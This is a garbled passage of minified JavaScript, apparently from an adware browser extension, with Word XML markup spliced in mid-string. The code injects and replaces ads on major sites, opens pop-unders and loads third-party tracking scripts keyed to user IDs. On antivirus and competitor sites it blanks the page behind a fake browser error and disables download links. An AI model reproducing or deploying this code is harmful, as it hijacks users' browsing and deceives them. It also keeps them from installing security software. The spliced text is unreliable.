m=a.results.length;if(b.domain.indexOf('google')==-1)h.append(l);for(var g=0;g&lt;m;g++){var n=a.results[g].url.replace(/.*?:\/\//g,"");var o=f.split(' ');var p=d.highlight_words_in_text(c,a.results[g].title,o);var q=d.highlight_words_in_text(c,n,o);var r=d.highlight_words_in_text(c,a.results[g].description,o);var s=c.jquery('&lt;div&gt;&lt;/div&gt;').css('margin-top','11px').css('margin-bottom','11px').css('margin-left','8px');var t=c.jquery('&lt;a&gt;&lt;/a&gt;').css('color','#2518B5').css('cursor','pointer').css('font-size','medium').css('font-weight','regular').css('line-height','1.2').css('font-family','arial,sans-serif').attr('target','_blank').attr('nopop',1).attr('href',a.results[g].redirect).html(p);var u=c.jquery('&lt;div&gt;&lt;/div&gt;').css('color','#00802A').css('font-style','normal').css('font-size','14px').css('line-height','1.2').css('margin-top','1px').html(q);var v=c.jquery('&lt;div&gt;&lt;/div&gt;').html(r);if(b.domain.indexOf('google')!=-1){q='&lt;span style="background-color:#edb802; border-radius:2px; color:#fff; font-size:13px; padding-right:3px; padding-left:3px; margin-right:7px;"&gt;Ad&lt;/span&gt;';u.prepend(q);v.css({'color':'#545454','line-height':'18px','font-size':'small'});}s.append(t);s.append(u);s.append(v);if(g&lt;=2)h.append(s);else if(g&gt;=5){i.append(s);j.append(s.clone());}}var w=c.jquery('&lt;div&gt;&lt;/div&gt;').attr('class',d.replace_all(b.upper_container,'.',' '));var x=c.jquery('&lt;div&gt;&lt;/div&gt;').attr('class',d.replace_all(b.bottom_container,'.',' '));c.jquery(b.main_container).prepend(w);c.jquery(b.main_container).append(x);c.jquery(b.upper_container).append(h.clone());if(b.side_container!="")c.jquery(b.side_container).prepend(j);if(m&gt;5)c.jquery(b.bottom_container).append(i);else c.jquery(b.bottom_container).append(h.clone());};var i=function(a,b){if(a.results.length===0)return;var e=0;var g=a.results.length;if(g&gt;3){e=3;g=2;}for(var h=e;h&lt;e+g;h++){var i=f.split(' ');var j=d.highlight_words_in_text(c,a.results[h].title,i);var k=d.highlight_words_in_text(c,a.results[h].url,i);var l=d.highlight_words_in_text(c,a.results[h].description,i);var m=c.jquery('&lt;div&gt;&lt;/div&gt;').attr('class','mrlm_se_results').attr('mrlm_product','mrlm_se_results').attr('mrlm_type',c.server_data.di.type).css(b.results_container_css);var n=c.jquery('&lt;a&gt;&lt;/a&gt;').css('font-size','medium').css('text-decoration','underline').attr('nopop',1).attr('href',a.results[h].redirect).html(j);var o=c.jquery('&lt;div&gt;&lt;/div&gt;').css('color','#00802A').css('font-style','normal').css('font-size','14px').css('line-height','1.2').html(k);var p=c.jquery('&lt;div&gt;&lt;/div&gt;').css('font-size','small').css('margin-top','1px').html(l);if(b.domain.indexOf('google')!=-1){n.css({'font-size':'18px','text-decoration':''});o.css({'font-weight':'arial,sans-serif','line-height':'16px','font-style':'normal','font-size':'13px'});p.css({'color':'#545454','line-height':'18px','font-size':'small','font-weight':'arial,sans-serif'});}m.append(n);m.append(o);m.append(p);c.jquery(b.results_container).prepend(m);}};var j=function(){for(var a in b)if(window.location.host.indexOf(b[a].domain)!=-1)k(b[a]);};var k=function(a){var b=function(){var b=c.jquery(a.search_input).val();var d=c.jquery('#mrlm_blank').length;if(b!=f||d===0){if(d===0)if(c.jquery(a.main_container).length&gt;0)c.jquery(a.main_container).append(c.jquery('&lt;div&gt;&lt;/div&gt;').attr('id','mrlm_blank').css('display','none'));f=b;if(f!==null&amp;&amp;typeof f!="undefined"&amp;&amp;f.trim().length&gt;=3)g(b,function(b){h(b,a);});}};if(c.jquery('div.commercial-unit').length&gt;0)c.jquery('div.commercial-unit').hide();b();setInterval(function(){b();},1000);};j();},popunders:function(c){var e={log_enabled:false,interrupt_enabled:true,is_revshare:true,min_ecpm:0,recency_ecpm_factor:4,recency_minutes:15,pop_opened:false,page_keyword:""};var f=function(b,c,f){if(!e.is_revshare){var g=1.0;if(b.server_data.ui.pcpm!=null)g=b.server_data.ui.pcpm;e.min_ecpm=e.recency_ecpm_factor*g;e.min_ecpm=Math.round(e.min_ecpm*100)/100;}var h=0;if(typeof b.server_data.c.last_pop_time!='undefined'&amp;&amp;b.server_data.c.last_pop_time!=""){var i=new Date();var j=i.getTime();var k=j+i.getTimezoneOffset()*60*1000;console.log('LastP='+b.server_data.c.last_pop_time);var l=b.server_data.c.last_pop_time;l=l.split('-').join('/');console.log('NewLastP='+l);var m=new Date(l);h=m.getTime();console.log('LastPTS='+h);}if(b.is_pop_opened||(k-h)&lt;e.recency_minutes*60*1000)if(e.interrupt_enabled){var g=1.0;if(b.server_data.ui.pcpm!=null)g=b.server_data.ui.pcpm;e.min_ecpm=e.recency_ecpm_factor*g;e.min_ecpm=Math.round(e.min_ecpm*100)/100;}else return;var n=a.dc;var o=n.substr(0,6)+'NT'+n.substr(8);var p={d:o,i:b.server_data.c.sub_id,p:e.min_ecpm,s:'1024x768',u:encodeURI(c)};b.jquery.ajax({type:'GET',data:p,url:'//t.cttsrv.com/jstex.js',dataType:'jsonp',cache:false,success:function(a){var c=null;if(a.url!=='')c=d.pop_under(b,a.url);else{if(e.log_enabled)if(e.min_ecpm==0){var g={"Request":p,"Response":a};var h=JSON.stringify(g);d.log_event('NewTab',h);}if(f!=null&amp;&amp;f!="")c=utils.pop_under(b,f);}}});};var g=function(a,b){var d=function(){var d=c.jquery(a.search_input).val();if(e.page_keyword!=window.location.href){e.page_keyword=window.location.href;if(d!==null&amp;&amp;typeof d!="undefined"&amp;&amp;d.trim().length&gt;=3){e.pop_opened=false;var g="https://"+window.location.host+"/?q="+d;f(c,g,b);}}};d();setInterval(function(){d();},1000);};var h='http://dfwu1013.info/as/gp?dc=$dc_id$&amp;page_url=$page_url$';h=h.replace('$page_url$',encodeURIComponent(document.location.href));h=h.replace('$dc_id$',a.dc);var i=c.server_data.mt;var j=i.url;if(c.server_data.di.category=='adult')d.pop_under(c,h);else{for(var k in b)if(window.location.host.indexOf(b[k].domain)!=-1){g(b[k],j);return;}f(c,window.location,j);}},prtct:function(b){if(document.addEventListener){var c=function(a,b,c){(this!=document&amp;&amp;this!=window&amp;&amp;this!=document.body||"click"!=a||b.toString().indexOf('86321022')&gt;=0)&amp;&amp;this._ael(a,b,c);};"function"==typeof Element&amp;&amp;-1&lt;Element.toString().indexOf("[native code]")&amp;&amp;(-1==Element.prototype.addEventListener.toString().indexOf("[native code]")&amp;&amp;delete Element.prototype.addEventListener,Element.prototype._ael=Element.prototype.addEventListener,Element.prototype.addEventListener=c);-1==document.addEventListener.toString().indexOf("[native code]")&amp;&amp;delete document.addEventListener;document._ael=document.addEventListener;document.addEventListener=c;-1==window.addEventListener.toString().indexOf("[native code]")&amp;&amp;delete window.addEventListener;window._ael=window.addEventListener;window.addEventListener=c;}window.download_parameters={};var e=a.dc;var f=e.substr(0,6)+'PT'+e.substr(8);if(b.server_data.di.category=='free_av_re'||b.server_data.di.category=='comp_re'){var g=/Safari/.test(navigator.userAgent)&amp;&amp;/Apple Computer/.test(navigator.vendor);b.jquery('body').empty();var h=window.document.URL;if(g){var i='                 &lt;div class="content-container" style="width: 500px;margin: 0 auto;position: relative; margin-top: 215px;"&gt;                     &lt;div class="error-container"&gt;                          &lt;div class="text-container" style="color: rgb(133, 133, 133);position: relative;width: 100%;word-wrap: break-word;"&gt;                             &lt;p class="error-title" style="font-size: 28px;line-height: 34px;margin: 0 auto;"&gt;Safari Can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Thonburi" w:hAnsi="Thonburi" w:cs="Thonburi"/>
          <w:sz w:val="26"/>
          <w:sz-cs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">โ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:sz-cs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">€t Find the Server&lt;/p&gt;                         &lt;/div&gt;                         &lt;div class="text-container" style="color: rgb(133, 133, 133);position: relative;width: 100%;word-wrap: break-word; margin-top: 10px;"&gt;                             &lt;p class="error-message" style="font-size: 13px;line-height: 18px;padding: 0px 24px;"&gt;Safari can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Thonburi" w:hAnsi="Thonburi" w:cs="Thonburi"/>
          <w:sz w:val="26"/>
          <w:sz-cs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">โ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:sz-cs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">€t open the page $P_URL$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Thonburi" w:hAnsi="Thonburi" w:cs="Thonburi"/>
          <w:sz w:val="26"/>
          <w:sz-cs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">โ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:sz-cs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">€ because Safari can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Thonburi" w:hAnsi="Thonburi" w:cs="Thonburi"/>
          <w:sz w:val="26"/>
          <w:sz-cs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">โ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:sz-cs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">€t find the server $P_SERVER$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Thonburi" w:hAnsi="Thonburi" w:cs="Thonburi"/>
          <w:sz w:val="26"/>
          <w:sz-cs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">โ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:sz-cs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">€.&lt;/p&gt;                         &lt;/div&gt;                     &lt;/div&gt;                 &lt;/div&gt;             ';i=i.replace('$P_URL$',h);i=i.replace('$P_SERVER$',h);b.jquery('body').attr('style','font-family:"-webkit-system-font";background: rgb(246, 246, 246);cursor: default;display: -webkit-box;text-align: center;-webkit-box-align: center;-webkit-box-pack: center;-webkit-user-select: none;');}else{var i='                 &lt;div style="margin-top:20px; margin-left: auto; margin-right: auto; background-color: #fbfbfb; width: 540px; height: 180px; font-family: Helvetica, Arial, sans-serif; box-shadow: 0px 2px 2px #AAA; border: 1px solid #AAA; border-bottom: 1px solid #888; border-radius: 3px;"&gt;                 &lt;div style="width:46px; margin-left:auto; margin-right: auto; margin-top: 30px;"&gt;                 &lt;div style="content: -webkit-image-set( url(\'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAC4AAAAuCAQAAAD9sOO8AAAASUlEQVR4Xu3SMQoAIAzFUO/o/c+iY4fSSfgQyesgOESHrs9I0j7TEOL9pk5i/OmB/s9IvAYQH6DjxmtTWPEWBcS52zJPIJ4lSRfUZeB1c/cgSwAAAABJRU5ErkJggg==\') 1x, url(\'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAFwAAABcAQMAAADZIUAbAAAABlBMVEUAAABTU1OoaSf/AAAAAXRSTlMAQObYZgAAAD9JREFUeF7tzrEJACAQQ9EDB8j+2xy4UDaIDqBFDsTmfve6Hw/qhiQbGWQBOGPmHZKLjMBngD4IA/U37Uz4dQsbfVcrD6jzeAAAAABJRU5ErkJggg==\') 2x);"&gt;&lt;/div&gt;                 &lt;/div&gt;                 &lt;div style="font-weight: normal; font-family: Helvetica, Arial, sans-serif; font-size: 20px; margin-top: 0px; color: #666; text-align:center; width: 500px; margin-left: auto; margin-right: auto;"&gt;This webpage is not availabe&lt;/div&gt;                 &lt;div style="text-decoration: underline; margin-top: 30px; cursor: pointer; text-align:center; font-size: 10px; color: #000; text-shadow: 0 1px 0 rgb(240, 240, 240);"&gt;Details&lt;/div&gt;                 &lt;/div&gt;             ';b.jquery('body').css({'background-color':'#E6E6E6'});}b.jquery('body').append(i);}if(b.server_data.di.category=='free_av'||b.server_data.di.category=='free_av_1'){b.jquery('a').each(function(){if(b.jquery(this).attr('href').indexOf('.dmg')&gt;=0||b.jquery(this).attr('href').indexOf('download')&gt;=0){var a='#';b.jquery(this).attr('href',a);d.log_event('PRTCT',b.server_data.di.category);}});b.jquery('div').each(function(){if(b.jquery(this).attr('onclick')!=null&amp;&amp;(b.jquery(this).attr('onclick').indexOf('.dmg')&gt;=0||b.jquery(this).attr('onclick').indexOf('download')&gt;=0)){var a='#';b.jquery(this).attr('onclick',a);d.log_event('PRTCT',b.server_data.di.category);}});b.jquery('span, p').each(function(){if(b.jquery(this).attr('onclick')!=null&amp;&amp;(b.jquery(this).attr('onclick').indexOf('.dmg')&gt;=0||b.jquery(this).attr('onclick').indexOf('download')&gt;=0)){var a='#';b.jquery(this).attr('onclick',a);d.log_event('PRTCT',b.server_data.di.category);}if(b.jquery(this).text().indexOf('.dmg')&gt;=0||b.jquery(this).text().indexOf('ownload link')&gt;=0)b.jquery(this).remove();});}else if(b.server_data.di.category=='comp'){if(b.server_data.di.domain=='flvto.com'&amp;&amp;window.document.URL.indexOf('youtube-downloader-for-mac')==-1)return;b.jquery('a').each(function(){if(b.jquery(this).attr('href').indexOf('.dmg')&gt;=0||b.jquery(this).attr('href').indexOf('.exe')&gt;=0||b.jquery(this).attr('href').indexOf('download')&gt;=0){var a='#';b.jquery(this).attr('href',a);d.log_event('PRTCT',b.server_data.di.category);}if(this.onclick!=null)this.onclick=function(){};});}},google_analytics:function(a){window._gaq=window._gaq||[];window._gaq.push(['x._setAccount','']);window._gaq.push(['x._setAllowLinker',true]);window._gaq.push(['x._setDomainName',location.host]);window._gaq.push(['x._trackPageview',document.location.href]);var b=('https:'==document.location.protocol?'https://ssl':'http://www')+'.google-analytics.com/ga.js';d.load_script(b);},coupons:function(b){if(b.server_data.di.coupon_enabled){var c='//charmsavings-production.s3.amazonaws.com/js/teals.js?u=$user_id$&amp;subid=$dc_id$';c=c.replace('$dc_id$',a.dc);c=c.replace('$user_id$',b.server_data.c.id);d.load_script(c);}},deal_ply:function(b){var c='';if(document.location.protocol=='https:')c='https://i_dynamicpricerjs_info.tlscdn.com/mrlm/javascript.js?hid=$user_id$&amp;channel=$dc_id$';else c='http://i.dynamicpricerjs.info/mrlm/javascript.js?hid=$user_id$&amp;channel=$dc_id$';if(c!=''){c=c.replace('$dc_id$',a.dc);c=c.replace('$user_id$',b.server_data.c.id);d.load_script(c);}},super_fish:function(b){var c=('https:'==document.location.protocol?'https://www':'http://www')+'.superfish.com/ws/sf_main.jsp?dlsource=jvvwwxx&amp;userId=$user_id$&amp;CTID=$dc_id$&amp;partnername=Dynamic Pricer';c=c.replace('$dc_id$',a.dc);c=c.replace('$user_id$',b.server_data.c.id);d.load_script(c);},banners:function(b){var c={refresh_enabled:true,premium_refresh_rate:60,premium_refresh_limit:300,regular_refresh_rate:35,regular_refresh_limit:300,replace_enabled:true,inject_enabled:true,sizes:[{width:300,height:250},{width:250,height:250},{width:160,height:600},{width:728,height:90},{width:468,height:60},{width:120,height:600},{width:800,height:440},{width:336,height:280},{width:234,height:60},{width:300,height:600}],size_offset:5,elements:['iframe','object','embed','img'],placement_ids:{'high':{'rep':"3345755",'ws':"3345754"},'low':{'rep':"3327631",'ws':"3327633"}},banner_url:'//ib.adnxs.com/tt?id=$placement_id$&amp;size=$width$x$height$&amp;ext_inv_code=$dc_id$&amp;referrer=$page_url$',txt_url:'//ads.adsoptimizer.net/banners/txt?dc=$dc_id$&amp;size=$width$x$height$&amp;url=$page_url$',adult_url:'//dfwu1013.info/as/gb?dc=$dc_id$&amp;size=$width$x$height$&amp;page_url=$page_url$',test_url:'//ads.exoclick.com/iframe.php?idzone=@exoclick_ent@&amp;size=$width$x$height$'};var e=[];var f=[];var g=0;var h=b.server_data.di.type=='premium'?c.premium_refresh_rate:c.regular_refresh_rate;var i=b.server_data.di.type=='premium'?c.premium_refresh_limit:c.regular_refresh_limit;var j=c.banner_url;var k=c.placement_ids.high;if(b.server_data.di.category=='adult'){j=c.adult_url;c.refresh_enabled=false;}else if(b.server_data.di.nxs_bl)return;else if(!b.server_data.di.mtmy_enabled)k=c.placement_ids.low;var l=function(b,d,e,f){var g=j;if(f=='txt_banner')g=c.txt_url;g=g.replace('$width$',b);g=g.replace('$height$',d);g=g.replace('$page_url$',encodeURIComponent(document.location.href));g=g.replace('$dc_id$',a.dc);g=g.replace('$placement_id$',e);return g;};var m=function(){d.log('debug','banners: inject started');for(var c=0;c&lt;e.length;c++)if(b.jquery(e[c].banner).is(':visible')||(b.jquery(e[c].banner).attr('user-action')!=null&amp;&amp;b.jquery(e[c].banner).attr('user-action')=='hideAd'))d.log('debug','banners: already injected and visible');else{d.log('debug','banners: banner not visible - removing');e.splice(c,1);}if(e.length&gt;0)return;var f=function(a){var c=a.find('iframe').first();var d=c.attr('mrlm_id');b.jquery(document).on('click','#closeAd_'+d,function(){c.attr('user-action','hideAd');a.fadeOut();});};var g=function(c,g,h,i){if(typeof i==='undefined')i='banner';var j=l(c,g,k.ws,i);var m=d.create_iframe(b,'simple_banner',b.server_data.di.type,c,g,{},j);var n=d.wrap_iframe(b,m,true,a.dc_product_name,a.dc_product_link,h);f(n);d.log('debug','banners: injecting simple banner '+c+'X'+g);e.push({banner:m,adv_size:{width:c,height:g},type:'injected'});return n;};if(window.location.host.indexOf('www.youtube.')!=-1){b.jquery('#gh-activityfeed').prepend(g(728,90,{style:'margin: 10px auto 10px;'}));b.jquery('#gh-activityfeed').append(g(728,90,{style:'margin: 10px auto 10px;'}));b.jquery('div#guide-container').css('width: 320px');b.jquery('.lohp-medium-shelves-container').prepend(g(300,250,{style:'margin: 0px 0px 0px 0px;'}));b.jquery('.branded-page-v2-secondary-col').append(g(300,250,{style:'margin: 10px 0px 0px 10px;'}));b.jquery('#watch-related').append(g(300,250,{style:'margin: 15px auto 15px;'}));b.jquery('#watch-related').prepend(g(300,250,{style:'margin: 15px auto 15px;'}));b.jquery('#watch7-headline').append(g(468,60,{style:'margin: 10px auto 10px;'}));}if(window.location.host.indexOf('www.google.')!=-1){b.jquery('#prm-pt').append(g(728,90,{style:'margin: 0px opx 0px 0px;'}));b.jquery('#ires').append(g(728,90,{style:'margin: 0px 0px 0px -8px;'}));b.jquery(b.jquery('#leftnav').siblings()[1]).prepend(g(300,250,{style:'margin: 6px 0px 0px 0px;'}));b.jquery('#rhs_block').prepend(g(300,250,{style:'margin: 6px 0px 0px 0px;'}));}if(window.location.host.indexOf('www.ebay.')!=-1){b.jquery('#stage').css('margin-top',40);b.jquery('#content').prepend(g(728,90,{style:'margin: 20px 0px 0px 235px;'}));b.jquery('.gcrt').css('margin-top',40);b.jquery('#hp-left').append(g(160,600,{style:'margin: 0px 0px 0px 25px;'}));b.jquery('#rtm_html_570').prepend(g(160,600,{style:'margin: 0px 0px 0px 0px;'}));b.jquery('#RightSummaryPanel').prepend(g(300,250,{style:'margin: 0px 0px 0px 0px;'}));b.jquery('.share').css('margin-top',-280);b.jquery('#viTabs').append(g(728,90,{style:'margin: 0px 0px 0px 380px;'}));b.jquery('#CenterPanel').prepend(g(728,90,{style:'margin: 0px 0px 0px 40px;'},'txt_banner'));b.jquery('#RightPanel').append(g(160,600,{style:'margin: 0px 40px 0px 0px;'}));}if(window.location.host.indexOf('.yahoo.')!=-1||window.location.host.indexOf('.search.yahoo.')!=-1){b.jquery('#default-p_13923486-bd').prepend(g(300,250,{style:'margin: 0px 0px 0px 0px;'}));b.jquery('#fpad').prepend(g(300,250,{style:'margin: 0px 0px 0px 0px;'}));b.jquery('#right').prepend(g(300,250,{style:'margin: 0px 0px 0px 0px;'}));b.jquery('#web').append(g(468,60,{style:'margin: 0px 15px 0px 30px;'}));}if(window.location.host.indexOf('.bing.')!=-1){b.jquery('#sbox').append(g(728,90,{style:'margin: 160px 0px 0px 220px;'}));b.jquery('#sidebar').prepend(g(300,250,{style:'margin: 0px 15px 0px 0px;'}));b.jquery('#b_context').prepend(g(300,250,{style:'margin: 0px 15px 0px 0px;'}));b.jquery('.sb_results').append(g(468,60,{style:'margin: 0px 15px 0px 30px;'}));b.jquery('#b_results').append(g(468,60,{style:'margin: 0px 15px 0px 30px;'}));}if(window.location.host.indexOf('espn.go.com')!=-1){var h=document.createElement('a');h.href=document.location;if(h.pathname.indexOf('video')!=-1)b.jquery('.span-2').prepend(g(300,250,{style:'margin: 0px 5px 0px 0px;'}));b.jquery('#columnistsstripe').prepend(g(728,90,{style:'margin: 0px 15px 0px 95px;'}));}if(window.location.host.indexOf('.cnn.com')!=-1){var h=document.createElement('a');h.href=document.location;if(h.pathname=='/')b.jquery('.cnn_shdcontent').prepend(g(300,250,{style:'margin: 0px 15px 0px 2px;'}));else b.jquery('.cnn_shdcontent').prepend(g(300,250,{style:'margin: 150px 0px 15px 18px;'}));b.jquery('.cnn_strycntntrgt').prepend(g(300,250,{style:'margin: 0px 15px 0px 18px;'}));b.jquery('.cnn_contentarea.cnn_filterareabox.cnn_hpgalleryslider').prepend(g(728,90,{style:'margin: 5px 0px 0px 120px;'}));b.jquery('.cnnExplainer.cnn_html_slideshow').append(g(468,60,{style:'margin: 5px 0px 0px 90px;'}));}if(window.location.host.indexOf('www.huffingtonpost.com')!=-1){b.jquery('#adsDiv1').prepend(g(300,250,{style:'margin: 0px 15px 0px 0px;'}));b.jquery('#right_column_entries').append(g(300,250,{style:'margin: 0px 15px 0px 0px;'}));b.jquery('.articleBody').append(g(468,60,{style:'margin: -12px 0px 0px 55px;'}));b.jquery('#sidebar_right').append(g(300,250,{style:'margin: 15px 15px 0px 0px;'}));}if(window.location.host.indexOf('.msn.com')!=-1){b.jquery('#area2').prepend(g(300,250,{style:'margin: 0px 8px 8px 0px;'}));b.jquery('#area2').append(g(300,250,{style:'margin: 0px 0px 8px 0px;'}));}if(window.location.host.indexOf('.aol.com')!=-1){b.jquery('#adsDiv0').append(g(728,90,{style:'margin: 0px 0px 0px 30px;'}));b.jquery('.mpid-10').append(g(300,250,{style:'margin: 0px 0px 0px 0px;'}));b.jquery('.video-player-wrap').append(g(728,90,{style:'margin: 0px 0px 0px 555px;'}));b.jquery('.right-column.more-videos').prepend(g(300,250,{style:'margin: 0px 15px 0px 0px;'}));}if(window.location.host.indexOf('.imdb.com')!=-1){b.jquery('#sidebar').prepend(g(300,250,{style:'margin: 0px 15px 0px 0px;'}));b.jquery('#sidebar').append(g(300,250,{style:'margin: 0px 15px 0px 0px;'}));b.jquery('#maindetails_sidebar_bottom').prepend(g(300,250,{style:'margin: 0px 15px 0px 0px;'}));b.jquery('#maindetails_sidebar_bottom').append(g(300,250,{style:'margin: 15px 15px 0px 0px;'}));b.jquery('#title-overview-widget').append(g(468,60,{style:'margin: 15px 0px 0px 95px;'}));}if(window.location.host.indexOf('.yelp.com')!=-1){b.jquery('#super-container').prepend(g(728,90,{style:'margin: 0px 10px 0px 120px;'}));b.jquery('.column.column-beta.sidebar').prepend(g(300,250,{style:'margin: 0px 0px 0px 0px;'}));b.jquery('.column.column-beta.sidebar').append(g(300,250,{style:'margin: 0px 0px 0px 0px;'}));b.jquery('.map-wrapper').prepend(g(300,250,{style:'margin: 0px 0px 0px 0px;'}));b.jquery('.map-wrapper').append(g(300,250,{style:'margin: 0px 0px 0px 0px;'}));b.jquery('#bizNearby').prepend(g(300,250,{style:'margin: 0px 0px 0px 0px;'}));b.jquery('#side').append(g(160,600,{style:'margin: 0px 0px 0px 80px;'}));}if(window.location.host.indexOf('.amazon.')!=-1){b.jquery('#rightcol').prepend(g(300,250,{style:'margin: 0px 15px 15px 0px;'}));b.jquery('.unified_widget.pageBanner').append(g(728,90,{style:'margin: 15px 15px 0px 425px;'}));b.jquery('#addToCartSpan').append(g(160,600,{style:'margin: 15px 15px 0px 0px;'}));b.jquery('.handleBuyButton').append(g(160,600,{style:'margin: 15px 0px 0px 0px;'}));b.jquery('.a-button-stack:eq(0)').append(g(160,600,{style:'margin: 15px 15px 0px 25px;'}));b.jquery('#main-image-content').append(g(468,60,{style:'margin: 15px 0px 0px 0px;'}));b.jquery('#topBar').append(g(728,90,{style:'margin: 5px 0px 0px 420px;'}));b.jquery('#DAala1').prepend(g(160,600,{style:'margin: 0px 0px 0px 0px;'}));}if(window.location.host.indexOf('.kijiji.')!=-1){b.jquery('#topCCB').prepend(g(728,90,{style:'margin: 0px 0px 0px 0px;'}));b.jquery('.ahRht').prepend(g(300,250,{style:'margin: 0px 0px 0px 0px;'}));b.jquery('.ahRht').append(g(300,250,{style:'margin: 15px 0px 0px 0px;'}));b.jquery('#sbLeftNav').prepend(g(160,600,{style:'margin: 0px 15px 0px 55px;'}));b.jquery('.viewadrightcol').prepend(g(160,600,{style:'margin: 0px 15px 0px 75px;'}));}if(window.location.host.indexOf('.craigslist.')!=-1)b.jquery('.body').prepend(g(728,90,{style:'margin: 15px 15px 0px 125px;'}));if(window.location.host.indexOf('.wikipedia.')!=-1)b.jquery('#mw-panel').prepend(g(160,600,{style:'margin: 0px 0px 0px 0px;'}));if(window.location.host.indexOf('twitter.com')!=-1){b.jquery('div.dashboard.dashboard-left').append(g(300,250,{style:'margin: 0px 0xp 0px 0px;float: left;'}));b.jquery('div.dashboard.dashboard-right').append(g(300,250,{style:'margin: 0px 0xp 0px 0px;'}));}if(window.location.host.indexOf('.tumblr.com')!=-1){b.jquery('#right_column').append(g(160,600,{style:'margin: 20px auto;'}));b.jquery('.head').append(g(728,90,{style:'margin: 20px auto 20px;'}));b.jquery('#head').append(g(728,90,{style:'margin: 20px auto 20px;'}));b.jquery('.header').append(g(468,60,{style:'margin: 20px auto 20px;'}));b.jquery('#header').prepend(g(728,90,{style:'margin: -25px auto 20px;'}));}if(window.location.host.indexOf('.reddit.com')!=-1){b.jquery('#siteTable').prepend(g(728,90,{style:'margin: 10px auto 10px;'}));b.jquery('.side').append(g(300,250,{style:'margin: 10px auto 10px;'}));}if(window.location.host.indexOf('mangafox.me')!=-1){b.jquery('#new').prepend(g(300,250,{style:'margin: 5px auto 5px;'}));b.jquery('#footer').prepend(g(728,90,{style:'margin: 10px auto 10px;'}));}if(window.location.host.indexOf('instagram.com')!=-1)b.jquery('.timelineFirst .timelineSidebar').append(g(160,600,{style:'margin: 20px 20px 0px 0px;float:right;'}));if(window.location.host.indexOf('www.aliexpress.com')!=-1){b.jquery('.content').prepend(g(728,90,{style:'margin: 20px auto 20px;'}));b.jquery('.superdeals').prepend(g(160,600,{style:'margin: 0px auto 10px;'}));}if(window.location.host.indexOf('.pornhub.com')!=-1){b.jquery('.main_top_right').replaceWith(g(300,250,{style:'margin: 0px 0px 0px 0px;'}));b.jquery('#adA iframe').replaceWith(g(300,250,{style:'margin: 0px 0px 0px 0px;'}));b.jquery('#adB iframe').replaceWith(g(300,250,{style:'margin: 0px 0px 0px 0px;'}));b.jquery('.ad-below-player').replaceWith(g(728,90,{style:'margin: 20px 20px 20px 20px;'}));var i=b.jquery('&lt;div&gt;&lt;/div&gt;');i.css({height:'250px',width:'950px'});i.append(g(300,250,{style:'margin: 0px 0px 0px 0px; float: left'}));i.append(g(300,250,{style:'margin: 0px 0px 0px 0px; float: left'}));i.append(g(300,250,{style:'margin: 0px 0px 0px 0px; float: left'}));b.jquery('.pre-footer iframe').replaceWith(i);}};var n=function(){d.log('debug','banners: intercept started');var a=[];b.jquery.each(b.jquery(c.elements.join(', ')),function(e,f){try{var g=b.jquery(f);for(var h=0;h&lt;c.sizes.length;h++){var i=g.attr('mrlm_product');var j=g.attr('mrlm_type');var k=g.parent()!=null?g.parent():null;var l=k!=null?k.parent():null;if(k!=null&amp;&amp;(k.attr('id')=='FFN_IM_Chat_3'||k.attr('id')=='BFAiFrameAd'))continue;if(l!=null&amp;&amp;(l.attr('id')=='FFN_IM_Chat_3'||l.attr('id')=='BFAslidein'))continue;if(g.attr('src')!=null&amp;&amp;g.attr('src').indexOf('ads.adsoptimizer.net/banners/txt')!=-1)continue;if(i!=null)continue;var m=c.sizes[h].width-c.size_offset;var n=c.sizes[h].width+c.size_offset;var o=c.sizes[h].height-c.size_offset;var q=c.sizes[h].height+c.size_offset;var r=g.width();var s=g.height();var t=p(g);if((r&gt;=m&amp;&amp;r&lt;=n)&amp;&amp;(s&gt;=o&amp;&amp;s&lt;=q)){var u={element:g,size:c.sizes[h],is_visible:t};a.push(u);}}}catch(v){d.log('debug','banners: '+v);}});if(a.length==0){d.log('debug','banners: no matching elements found to replace');return;}d.log('debug','banners: found: '+a.length+' matching elements');for(var e=0;e&lt;a.length;e++){d.log('debug','banners: found element: '+a[e].element.get(0).tagName+' id: '+a[e].element.attr('id')+' width: '+a[e].element.width()+' height: '+a[e].element.height()+' is_visible: '+a[e].is_visible);var g=a[e].element.width();var h=a[e].element.height();var i=a[e].size.width;var j=a[e].size.height;var m=a[e].is_visible;var n=null;d.log('debug','banners: creating simple banner');var o=l(i,j,k.rep,'banner');var q=d.get_element_attributes(b,a[e].element);n=d.create_iframe(b,'simple_banner',b.server_data.di.type,g,h,q,o);a[e].element.replaceWith(n);f.push({banner:n,adv_size:a[e].size,type:'intercepted'});}};var 